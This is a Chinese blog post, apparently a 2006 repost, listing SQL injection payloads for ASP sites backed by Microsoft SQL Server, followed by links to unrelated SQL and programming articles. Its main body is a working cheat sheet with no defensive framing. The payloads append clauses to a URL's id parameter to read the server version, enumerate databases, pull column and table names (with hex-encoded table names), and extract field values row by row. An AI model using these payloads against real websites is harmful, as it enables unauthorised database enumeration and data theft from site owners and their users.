注入的几条简单语句

转载 2006年06月08日 14:53:00
一、版本
url/1.asp?id=1 and @@VERSION>0
二、跨库
url/1.asp?id=1 and 1=(select db_name(n))
n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?
三、列名
url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)
四、表名字段值
select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))
字段值:
select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)
n改1,2,3,4就可以得库名、列名

相关文章推荐

Oracle几条有用的SQL语句

查找数据库中所有字段  以对应的表 select C.column_name,C.TABLE_NAME from dba_tab_columns C where owner='' 查每个科...

绝对经典sql语句查询分类前几条信息 ,并按某字段排序

sql语句查询分类前几条信息 1.SQL2005,情况下使用 行号 Row_Number() SELECT * FROM ( SELECT ROW_NUMBER() OVER(...

11、SQL Server:绝对经典sql语句查询分类前几条信息 ,并按某字段排序(有点东西没看懂)

本文来自:http://blog.csdn.net/hatchgavin/article/details/6700417 sql语句查询分类前几条信息 1.SQL2005,情况下使用 ...

JAVA中的几条重要语句

do….while while if for switch (1)do…while 语句 do …while 结构: do{ ...

sql分组后查找每组的前几条记录语句

常用的sqlserver,mysql,oracle等数据库sql语句都是遵循sql标准,但是每种数据库都有自己的特点。 如果想做到程序兼容性更好,后期维护更方便,还是建议尽量使用各种数据库通用的sql...

收藏几条有用的SQL语句

SQL SERVER 2000中各表外键名,主键名的获取(SQL2000) SELECT   外键表ID   = b.fkeyid ,  外键表名称 = object_name(b.fkeyid) ,...
  • sxycgxj
  • sxycgxj
  • 2011年06月16日 08:18
  • 465

几条简单的docker命令

本篇介绍几条简单的docker命令。 sudo docker pull ubuntu 获取镜像 sudo docker images 查看镜像信息 sudo docker inspect 980e0e...

几条简单命令检查Linux服务器性能

如果linux服务器突然负载暴增,如何在最短时间内找出linux性能问题所在?                  服务器高负载因为什么而起?              下列项目的过度使用...

几条简单的OO原则

1. 封装变化2. 多用组合,少用继承3. 针对接口编程,不针对实现编程4. 为交互对象之间的松耦合设计而努力...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:注入的几条简单语句
举报原因:
原因补充:

(最多只允许输入30个字)